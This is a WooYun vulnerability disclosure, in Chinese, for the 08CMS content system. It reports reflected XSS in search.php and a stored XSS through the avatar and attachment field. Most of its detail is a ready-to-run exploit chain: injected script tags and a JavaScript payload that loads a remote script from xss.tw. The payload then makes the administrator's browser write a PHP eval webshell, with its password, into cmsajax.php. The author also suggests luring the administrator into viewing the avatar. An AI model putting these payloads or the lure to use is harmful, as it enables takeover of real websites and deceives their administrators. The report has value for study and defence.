当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044261

漏洞标题:08cms存储型XSS可getshell(较鸡肋)

相关厂商:08CMS

漏洞作者: redrain有节操

提交时间:2013-11-28 15:05

修复时间:2014-01-12 15:06

公开时间:2014-01-12 15:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用户在前台构造xss,管理在后台直接getshell

详细说明:

赠送几个反射型:
搜索处存在反射性xss

/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1<ScRiPt%2520>prompt(968256)</sCripT>


/search.php?caid=2&ccid1=208&chid=4&djfrom=1<ScRiPt%2520>prompt(981700)</sCripT>


/search.php?caid=4&chid=2&mchid=1&zjfrom=1<ScRiPt%2520>prompt(966559)</sCripT>


/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1<ScRiPt%2520>prompt(922207)</sCripT>


用户在前台修改头像的时候发现可以外部调用,仅仅是检查了后缀,然后在附件的地方插入
http://xxx.com/"><script>alert(1)</script>adminc/images/logo_member.png
返回我的首页,发现成功的触发了xss
再插入
http://xxx.com/"><script src="http://xxx.js"></script><img src="http://www.baidu.com/img/bdlogo.gif
管理员后台查看后(可和管理反应,哎呀,我的头像有问题啊,之类的),成功地触发了成功的getshell cmsajax.php 密码fuckhelen
getshell的payload如下:

document.writeln("<script src=http://xss.tw/5237></script>");
function ajax(){
	var request = false;
	if(window.XMLHttpRequest) {
		request = new XMLHttpRequest();
	} else if(window.ActiveXObject) {
		var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
		for(var i=0; i<versions.length; i++) {
			try {
				request = new ActiveXObject(versions[i]);
			} catch(e) {}
		}
	}
	return request;
}
var _x = ajax();
postgo();
function postgo() {
	src="/admina.php?entry=csstpls&action=filedetail&filename=cmsajax.php&jsmode=1&forward=";
	data="contentnew=%3C%3Fphp+eval%28%24_POST%5Bfuckhelen%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";
	xhr_act("POST",src,data);
	}
function xhr_act(_m,_s,_a){
	_x.open(_m,_s,false);
	if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	_x.send(_a);
	return _x.responseText;
}


漏洞证明:

1.png


2.png

修复方案:

版权声明:转载请注明来源 redrain有节操@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝